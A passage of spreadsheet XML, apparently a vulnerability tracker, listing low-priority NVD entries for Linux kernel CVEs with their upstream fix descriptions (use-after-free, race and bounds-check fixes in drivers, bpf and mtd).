      <c r="G855" s="5" t="inlineStr"/>
      <c r="H855" s="5" t="inlineStr"/>
      <c r="I855" s="5" t="inlineStr"/>
      <c r="J855" s="5" t="inlineStr"/>
      <c r="K855" s="5" t="inlineStr"/>
      <c r="L855" s="5" t="inlineStr"/>
      <c r="M855" s="5" t="inlineStr"/>
      <c r="N855" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O855" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P855" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q855" s="5" t="inlineStr"/>
      <c r="R855" s="5" t="inlineStr"/>
      <c r="S855" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/hfi1: Propagate sdma_txinit_ahg() errors
set_txreq_header_ahg() ignores the return value of sdma_txinit_ahg().
If sdma_txinit_ahg() fails, it returns before initializing tx-&gt;txreq.
However, set_txreq_header_ahg() ignores the error and returns the AHG
change count, causing the caller to continue processing the request as
though initialization had succeeded.
Propagate sdma_txinit_ahg() failures to the caller and abort request
processing when initialization fails.
Found by Linux Verification Center (linuxtesting.org) with SVACE.</t>
        </is>
      </c>
      <c r="T855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93037</t>
        </is>
      </c>
    </row>
    <row r="856">
      <c r="A856" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B856" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93038</t>
        </is>
      </c>
      <c r="D856" s="5" t="inlineStr"/>
      <c r="E856" s="5" t="inlineStr"/>
      <c r="F856" s="5" t="inlineStr"/>
      <c r="G856" s="5" t="inlineStr"/>
      <c r="H856" s="5" t="inlineStr"/>
      <c r="I856" s="5" t="inlineStr"/>
      <c r="J856" s="5" t="inlineStr"/>
      <c r="K856" s="5" t="inlineStr"/>
      <c r="L856" s="5" t="inlineStr"/>
      <c r="M856" s="5" t="inlineStr"/>
      <c r="N856" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O856" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P856" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q856" s="5" t="inlineStr"/>
      <c r="R856" s="5" t="inlineStr"/>
      <c r="S856" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: dac: ad5686: missing NULL check on match data
Verify that chip_info pointer is not NULL. If a user binds the driver
using driver_override via sysfs with a device name not present in the
id_table or of_match_table, match data will be NULL.</t>
        </is>
      </c>
      <c r="T856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93038</t>
        </is>
      </c>
    </row>
    <row r="857">
      <c r="A857" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B857" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93039</t>
        </is>
      </c>
      <c r="D857" s="5" t="inlineStr"/>
      <c r="E857" s="5" t="inlineStr"/>
      <c r="F857" s="5" t="inlineStr"/>
      <c r="G857" s="5" t="inlineStr"/>
      <c r="H857" s="5" t="inlineStr"/>
      <c r="I857" s="5" t="inlineStr"/>
      <c r="J857" s="5" t="inlineStr"/>
      <c r="K857" s="5" t="inlineStr"/>
      <c r="L857" s="5" t="inlineStr"/>
      <c r="M857" s="5" t="inlineStr"/>
      <c r="N857" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O857" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P857" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q857" s="5" t="inlineStr"/>
      <c r="R857" s="5" t="inlineStr"/>
      <c r="S857" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: meson: Keep link pointers valid on realloc failure
meson_card_reallocate_links() grows the DAI link and private data
arrays with two consecutive krealloc() calls and updates the owner
pointers only after both calls have succeeded.
A successful krealloc() may move the data: it frees the old block and
returns a new one. When that happens for the link array and the second
krealloc() then fails, card-&gt;dai_link still points to the block that
krealloc() already freed, and the error path frees the new block too.
The probe error path then calls meson_card_clean_references(), which
dereferences card-&gt;dai_link and kfree()s it again, resulting in a
use-after-free and a double free.
Commit card-&gt;dai_link and card-&gt;num_links right after the first
krealloc() succeeds, so the pointer always refers to a valid allocation
that meson_card_clean_references() can walk and free. krealloc() with
__GFP_ZERO zero-initializes the added entries, so walking them on the
error path is safe. With both failure paths reduced to a plain return,
drop the goto labels and the error message.</t>
        </is>
      </c>
      <c r="T857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93039</t>
        </is>
      </c>
    </row>
    <row r="858">
      <c r="A858" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B858" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93040</t>
        </is>
      </c>
      <c r="D858" s="5" t="inlineStr"/>
      <c r="E858" s="5" t="inlineStr"/>
      <c r="F858" s="5" t="inlineStr"/>
      <c r="G858" s="5" t="inlineStr"/>
      <c r="H858" s="5" t="inlineStr"/>
      <c r="I858" s="5" t="inlineStr"/>
      <c r="J858" s="5" t="inlineStr"/>
      <c r="K858" s="5" t="inlineStr"/>
      <c r="L858" s="5" t="inlineStr"/>
      <c r="M858" s="5" t="inlineStr"/>
      <c r="N858" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O858" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P858" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q858" s="5" t="inlineStr"/>
      <c r="R858" s="5" t="inlineStr"/>
      <c r="S858" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dmaengine: dw-edma: Serialize channel state checks
pause() and resume() read and update channel state without holding vc.lock,
while the interrupt handlers update the same state under it. Take the same
lock around those state checks so that request, status, and configured stay
consistent.
For example, pause() can observe EDMA_ST_BUSY right before the interrupt
handler completes the final descriptor and moves the channel to
EDMA_ST_IDLE, and then record EDMA_REQ_PAUSE on an already idle channel. No
further interrupt will acknowledge the request, and since issue_pending()
requires EDMA_REQ_NONE, the channel is wedged for good: terminate_all()
leaves the stale request behind, so even reconfiguring the channel does not
recover it.
issue_pending() already runs under vc.lock, but it tests configured before
taking it. Move that test under the lock as well, so configured, request,
and status are evaluated as one channel-state snapshot.</t>
        </is>
      </c>
      <c r="T858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93040</t>
        </is>
      </c>
    </row>
    <row r="859">
      <c r="A859" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B859" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93041</t>
        </is>
      </c>
      <c r="D859" s="5" t="inlineStr"/>
      <c r="E859" s="5" t="inlineStr"/>
      <c r="F859" s="5" t="inlineStr"/>
      <c r="G859" s="5" t="inlineStr"/>
      <c r="H859" s="5" t="inlineStr"/>
      <c r="I859" s="5" t="inlineStr"/>
      <c r="J859" s="5" t="inlineStr"/>
      <c r="K859" s="5" t="inlineStr"/>
      <c r="L859" s="5" t="inlineStr"/>
      <c r="M859" s="5" t="inlineStr"/>
      <c r="N859" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O859" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P859" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q859" s="5" t="inlineStr"/>
      <c r="R859" s="5" t="inlineStr"/>
      <c r="S859" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dmaengine: dw-edma: Serialize abort state updates
dw_edma_abort_interrupt() drops vc.lock before changing request and
status. issue_pending() can acquire the lock in that small window,
observe the old busy state, and skip starting queued descriptors. Then
the abort handler overwrites the channel status as idle, leaving the new
descriptors stranded for good.
Keep descriptor completion and the state transition in the same critical
section.</t>
        </is>
      </c>
      <c r="T859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93041</t>
        </is>
      </c>
    </row>
    <row r="860">
      <c r="A860" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B860" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93042</t>
        </is>
      </c>
      <c r="D860" s="5" t="inlineStr"/>
      <c r="E860" s="5" t="inlineStr"/>
      <c r="F860" s="5" t="inlineStr"/>
      <c r="G860" s="5" t="inlineStr"/>
      <c r="H860" s="5" t="inlineStr"/>
      <c r="I860" s="5" t="inlineStr"/>
      <c r="J860" s="5" t="inlineStr"/>
      <c r="K860" s="5" t="inlineStr"/>
      <c r="L860" s="5" t="inlineStr"/>
      <c r="M860" s="5" t="inlineStr"/>
      <c r="N860" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O860" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P860" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q860" s="5" t="inlineStr"/>
      <c r="R860" s="5" t="inlineStr"/>
      <c r="S860" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dmaengine: dw-edma: Terminate all descriptors without callbacks
The DMA Engine client documentation says in the "Terminate APIs" section
of Documentation/driver-api/dmaengine/client.rst:
"No callback functions will be called for any incomplete transfers."
dw-edma instead calls vchan_cookie_complete() when a deferred STOP reaches
the interrupt handler. This schedules a callback for the active descriptor
and leaves other issued or submitted descriptors queued. A late callback
after dmaengine_terminate_sync() can dereference client state that has
already been freed, while leftover descriptors may later restart into
reused buffers or leak.
Move all issued and submitted descriptors to the terminated list whenever
termination completes. For a pending STOP, do this from both the DONE and
ABORT paths. Complete their cookies in order without scheduling callbacks.
A STOP can remain pending until the running transfer raises an
interrupt. Make device_synchronize() wait for such a pending STOP to
complete before releasing terminated descriptors. Reuse it from
free_chan_resources(), then release the remaining virt-dma resources.
Sleep instead of busy-polling while waiting, and warn if the existing
timeout expires.</t>
        </is>
      </c>
      <c r="T860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93042</t>
        </is>
      </c>
    </row>
    <row r="861">
      <c r="A861" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B861" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93043</t>
        </is>
      </c>
      <c r="D861" s="5" t="inlineStr"/>
      <c r="E861" s="5" t="inlineStr"/>
      <c r="F861" s="5" t="inlineStr"/>
      <c r="G861" s="5" t="inlineStr"/>
      <c r="H861" s="5" t="inlineStr"/>
      <c r="I861" s="5" t="inlineStr"/>
      <c r="J861" s="5" t="inlineStr"/>
      <c r="K861" s="5" t="inlineStr"/>
      <c r="L861" s="5" t="inlineStr"/>
      <c r="M861" s="5" t="inlineStr"/>
      <c r="N861" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O861" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P861" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q861" s="5" t="inlineStr"/>
      <c r="R861" s="5" t="inlineStr"/>
      <c r="S861" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Disallow interpreter fallback for gotox insn
The interpreter does not recognize the BPF_JMP|BPF_JA|BPF_X insn, which
is used for insn_array map. Thereafter, it would hit the BUG_ON() in
___bpf_prog_run() at run time.
[    2.563726] BPF interpreter: unknown opcode 0d (imm: 0x0)
[    2.564557] ------------[ cut here ]------------
[    2.565206] kernel BUG at kernel/bpf/core.c:2349!
[    2.565882] Oops: invalid opcode: 0000 [#1] SMP PTI
Set jit_required as true when insn_array map is used in the prog in
order to disallow interpreter fallback for gotox insn in
core.c::__bpf_prog_select_runtime().</t>
        </is>
      </c>
      <c r="T861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93043</t>
        </is>
      </c>
    </row>
    <row r="862">
      <c r="A862" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B862" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93044</t>
        </is>
      </c>
      <c r="D862" s="5" t="inlineStr"/>
      <c r="E862" s="5" t="inlineStr"/>
      <c r="F862" s="5" t="inlineStr"/>
      <c r="G862" s="5" t="inlineStr"/>
      <c r="H862" s="5" t="inlineStr"/>
      <c r="I862" s="5" t="inlineStr"/>
      <c r="J862" s="5" t="inlineStr"/>
      <c r="K862" s="5" t="inlineStr"/>
      <c r="L862" s="5" t="inlineStr"/>
      <c r="M862" s="5" t="inlineStr"/>
      <c r="N862" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O862" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P862" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q862" s="5" t="inlineStr"/>
      <c r="R862" s="5" t="inlineStr"/>
      <c r="S862" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Disallow interpreter fallback for arena-related insns
Since the interpreter does not support the arena-related insns,
interpreter fallback should not be allowed for these insns in
core.c::__bpf_prog_select_runtime().
Currently, when the interpreter executes the arena ST/LDX/STX insns,
it would hit the BUG_ON() in ___bpf_prog_run() at run time.
[    2.579196] BPF interpreter: unknown opcode a2 (imm: 0x0)
[    2.579998] ------------[ cut here ]------------
[    2.580652] kernel BUG at kernel/bpf/core.c:2349!
[    2.581314] Oops: invalid opcode: 0000 [#1] SMP PTI
Set jit_required as true when arena map is used in the prog to disallow
interpreter fallback for arena-related insns.</t>
        </is>
      </c>
      <c r="T862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93044</t>
        </is>
      </c>
    </row>
    <row r="863">
      <c r="A863" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B863" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93045</t>
        </is>
      </c>
      <c r="D863" s="5" t="inlineStr"/>
      <c r="E863" s="5" t="inlineStr"/>
      <c r="F863" s="5" t="inlineStr"/>
      <c r="G863" s="5" t="inlineStr"/>
      <c r="H863" s="5" t="inlineStr"/>
      <c r="I863" s="5" t="inlineStr"/>
      <c r="J863" s="5" t="inlineStr"/>
      <c r="K863" s="5" t="inlineStr"/>
      <c r="L863" s="5" t="inlineStr"/>
      <c r="M863" s="5" t="inlineStr"/>
      <c r="N863" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O863" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P863" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q863" s="5" t="inlineStr"/>
      <c r="R863" s="5" t="inlineStr"/>
      <c r="S863" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject arena frees below the arena base
bpf_arena_free_pages() accepts scalar arena addresses. The runtime
masks the address to the low 32 bits and reconstructs a full user
address from the arena base before returning the range to the arena
free tree.
When the scalar value is below the low 32 bits of the arena base,
full_uaddr falls below user_vm_start. The existing upper-end clipping
then turns this into an out-of-range free-tree offset. A later
allocation can reuse that offset and return an address below the arena
mapping.
Reject such frees before computing the clipped range.</t>
        </is>
      </c>
      <c r="T863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93045</t>
        </is>
      </c>
    </row>
    <row r="864">
      <c r="A864" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B864" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93046</t>
        </is>
      </c>
      <c r="D864" s="5" t="inlineStr"/>
      <c r="E864" s="5" t="inlineStr"/>
      <c r="F864" s="5" t="inlineStr"/>
      <c r="G864" s="5" t="inlineStr"/>
      <c r="H864" s="5" t="inlineStr"/>
      <c r="I864" s="5" t="inlineStr"/>
      <c r="J864" s="5" t="inlineStr"/>
      <c r="K864" s="5" t="inlineStr"/>
      <c r="L864" s="5" t="inlineStr"/>
      <c r="M864" s="5" t="inlineStr"/>
      <c r="N864" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O864" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P864" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q864" s="5" t="inlineStr"/>
      <c r="R864" s="5" t="inlineStr"/>
      <c r="S864" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
software node: Fix software_node_get_reference_args() with index -1
The bounds check for the index passed to
software_node_get_reference_args() was failing when passed UINT_MAX,
this in turn would lead to an out of bound access in the property
array. Fix the bound check to also cover the UINT_MAX case.</t>
        </is>
      </c>
      <c r="T864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93046</t>
        </is>
      </c>
    </row>
    <row r="865">
      <c r="A865" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B865" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93047</t>
        </is>
      </c>
      <c r="D865" s="5" t="inlineStr"/>
      <c r="E865" s="5" t="inlineStr"/>
      <c r="F865" s="5" t="inlineStr"/>
      <c r="G865" s="5" t="inlineStr"/>
      <c r="H865" s="5" t="inlineStr"/>
      <c r="I865" s="5" t="inlineStr"/>
      <c r="J865" s="5" t="inlineStr"/>
      <c r="K865" s="5" t="inlineStr"/>
      <c r="L865" s="5" t="inlineStr"/>
      <c r="M865" s="5" t="inlineStr"/>
      <c r="N865" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O865" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P865" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q865" s="5" t="inlineStr"/>
      <c r="R865" s="5" t="inlineStr"/>
      <c r="S865" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/v3d: Associate BOs with every job that accesses them
A submission can expand into a chain of jobs (e.g. bin + render + cache
clean). Implicit synchronization in v3d_submit_lock_reservations() is gated
on each job's bo[], but the BO list was only ever attached to the last job
of the chain. When that last job is a trailing CACHE_CLEAN job, the job
that actually consumes the BOs (that is, a RENDER or CSD job) was left with
bo_count == 0 and picked up no implicit dependencies. It could therefore
be dispatched to the hardware and read a BO while another context was still
writing it, leading to data corruption.
Attach the BOs to the job that consumes them, so (1) it acquires the
correct implicit dependencies during reservation locking and (2) they are
kept mapped until the end of the submission. Give it references to all
consuming job's BOs through v3d_job_reference_bos() instead of looking the
handles up a second time; that avoids a redundant lookup and guarantees
both jobs reference the exact same objects.
As the CACHE_CLEAN job now carries a BO array as well, add a per-job
`has_implicit_dep` flag so that only the consuming jobs take implicit
dependencies. The CACHE_CLEAN job (a global flush) and the BIN job (binning
waiting on another context is not a realistic scenario) are excluded.</t>
        </is>
      </c>
      <c r="T865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93047</t>
        </is>
      </c>
    </row>
    <row r="866">
      <c r="A866" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B866" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93048</t>
        </is>
      </c>
      <c r="D866" s="5" t="inlineStr"/>
      <c r="E866" s="5" t="inlineStr"/>
      <c r="F866" s="5" t="inlineStr"/>
      <c r="G866" s="5" t="inlineStr"/>
      <c r="H866" s="5" t="inlineStr"/>
      <c r="I866" s="5" t="inlineStr"/>
      <c r="J866" s="5" t="inlineStr"/>
      <c r="K866" s="5" t="inlineStr"/>
      <c r="L866" s="5" t="inlineStr"/>
      <c r="M866" s="5" t="inlineStr"/>
      <c r="N866" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O866" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P866" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q866" s="5" t="inlineStr"/>
      <c r="R866" s="5" t="inlineStr"/>
      <c r="S866" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mtd: part: reject MTDPART_OFS_RETAIN in mtd_add_partition()
mtd_add_partition() does not reject the special offset value
MTDPART_OFS_RETAIN (-3), which leads to a WARN_ON in
add_mtd_device() when called through the BLKPG ioctl on NAND
devices. The RETAIN value depends on cur_offset being the end of
the previous partition, but in the dynamic partition path
cur_offset equals the offset argument itself, causing undefined
behavior.
Commit 5daa7b21496a ("mtd: prepare partition add and del functions
for ioctl requests") introduced mtd_add_partition() and correctly
rejected MTDPART_OFS_APPEND (-1) and MTDPART_OFS_NXTBLK (-2),
since those special offsets rely on cur_offset tracking the
previous partition's end. However, commit 1a31368bf92e ("mtd: add a flags
for partitions which should just leave smth. after them")
later added MTDPART_OFS_RETAIN (-3) for the static
partition table path without updating mtd_add_partition() to
also reject this value.
With offset=-3 passed via BLKPG, the RETAIN size calculation in
allocate_partition() underflows (parent_size - 0xFFFFFFFFFFFFFFFD
= parent_size + 3). If the underflow result does not appear to
leave enough space, allocate_partition() jumps to out_register via
goto, skipping erasesize initialization. This results in
erasesize=0, which triggers:
WARN_ON((!mtd-&gt;erasesize || !master-&gt;_erase) &amp;&amp;
		!(mtd-&gt;flags &amp; MTD_NO_ERASE))
in add_mtd_device(). If the underflow result appears to leave
enough space, a bogus partition size is calculated, but the
"out of reach" sanity check catches the invalid offset and
creates a disabled empty partition (offset=0, size=0) instead
of returning an error.
Fix this by adding MTDPART_OFS_RETAIN to the rejection list in
mtd_add_partition(), consistent with the existing handling of
APPEND and NXTBLK.</t>
        </is>
      </c>
      <c r="T866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93048</t>
        </is>
      </c>
    </row>
    <row r="867">
      <c r="A867" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B867" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93049</t>
        </is>
      </c>
      <c r="D867" s="5" t="inlineStr"/>
      <c r="E867" s="5" t="inlineStr"/>
      <c r="F867" s="5" t="inlineStr"/>
      <c r="G867" s="5" t="inlineStr"/>
      <c r="H867" s="5" t="inlineStr"/>
      <c r="I867" s="5" t="inlineStr"/>
      <c r="J867" s="5" t="inlineStr"/>
      <c r="K867" s="5" t="inlineStr"/>
      <c r="L867" s="5" t="inlineStr"/>
      <c r="M867" s="5" t="inlineStr"/>
      <c r="N867" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O867" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P867" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q867" s="5" t="inlineStr"/>
      <c r="R867" s="5" t="inlineStr"/>
      <c r="S867" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mtd: mtdswap: Avoid freeing registered blktrans device twice
In mtdswap_add_mtd(), debugfs setup failure after successful blktrans
registration can free mbd_dev twice.
add_mtd_blktrans_dev() initializes the blktrans device reference and
publishes the disk. Once that succeeds, del_mtd_blktrans_dev() tears the
disk down and drops the blktrans reference; when that reference reaches
zero, blktrans_dev_release() frees the mtd_blktrans_dev.
The debugfs failure path called del_mtd_blktrans_dev(mbd_dev), then fell
through the common cleanup label and called kfree(mbd_dev) again. Clear
the local pointer after deregistration so the common cleanup can still
release the mtdswap state without freeing the blktrans object twice.
This issue was found by a static analysis checker and confirmed by
manual source review.</t>
        </is>
      </c>
      <c r="T867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93049</t>
        </is>
      </c>
    </row>
    <row r="868">
      <c r="A868" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B868" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93050</t>
        </is>
      </c>
      <c r="D868" s="5" t="inlineStr"/>
      <c r="E868" s="5" t="inlineStr"/>
      <c r="F868" s="5" t="inlineStr"/>
      <c r="G868" s="5" t="inlineStr"/>
      <c r="H868" s="5" t="inlineStr"/>
      <c r="I868" s="5" t="inlineStr"/>
      <c r="J868" s="5" t="inlineStr"/>
      <c r="K868" s="5" t="inlineStr"/>
      <c r="L868" s="5" t="inlineStr"/>
      <c r="M868" s="5" t="inlineStr"/>
      <c r="N868" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O868" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P868" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q868" s="5" t="inlineStr"/>
      <c r="R868" s="5" t="inlineStr"/>
      <c r="S868" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipack: ipoctal: fix UAF, null-ptr-deref, and use-after-free in cleanup on remove
Three issues arise when the device is removed while a tty session is
still active:
1. UAF of struct ipoctal: the remove callback frees ipoctal via
   kfree() while tty ops may still access it.  Fix by introducing
   kref-based lifetime management — kref is taken in install() when
   a tty is opened and released in cleanup() when the tty is finally
   destroyed; remove() uses kref_put() instead of kfree().
2. NULL dereference in ipoctal_write_tty(): __ipoctal_remove()
   frees xmit_buf via tty_port_free_xmit_buf() while a userspace
   process may still hold the tty fd and call write().  Fix by
   checking for NULL xmit_buf in ipoctal_write_tty().
3. UAF in ipoctal_cleanup(): ipack_put_carrier(ipoctal-&gt;dev)
   dereferences ipoctal-&gt;dev after the ipack_device has been freed
   by ipack_device_del().  Fix by caching ipoctal-&gt;carrier_owner
   during probe() and calling module_put() on the cached pointer
   directly in cleanup(), avoiding any access to ipoctal-&gt;dev.
Also introduce a "removed" flag in struct ipoctal, set at the start
of __ipoctal_remove(), and checked in every tty op that accesses
hardware resources (port_activate, write_tty, set_termios, hangup,
shutdown).  This prevents page faults when devm_ioremap() regions
are unmapped after remove() returns.</t>
        </is>
      </c>
      <c r="T868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93050</t>
        </is>
      </c>
    </row>
    <row r="869">
      <c r="A869" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B869" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93051</t>
        </is>
      </c>
      <c r="D869" s="5" t="inlineStr"/>
      <c r="E869" s="5" t="inlineStr"/>
      <c r="F869" s="5" t="inlineStr"/>
      <c r="G869" s="5" t="inlineStr"/>
      <c r="H869" s="5" t="inlineStr"/>
      <c r="I869" s="5" t="inlineStr"/>
      <c r="J869" s="5" t="inlineStr"/>
      <c r="K869" s="5" t="inlineStr"/>
      <c r="L869" s="5" t="inlineStr"/>
      <c r="M869" s="5" t="inlineStr"/>
      <c r="N869" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O869" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
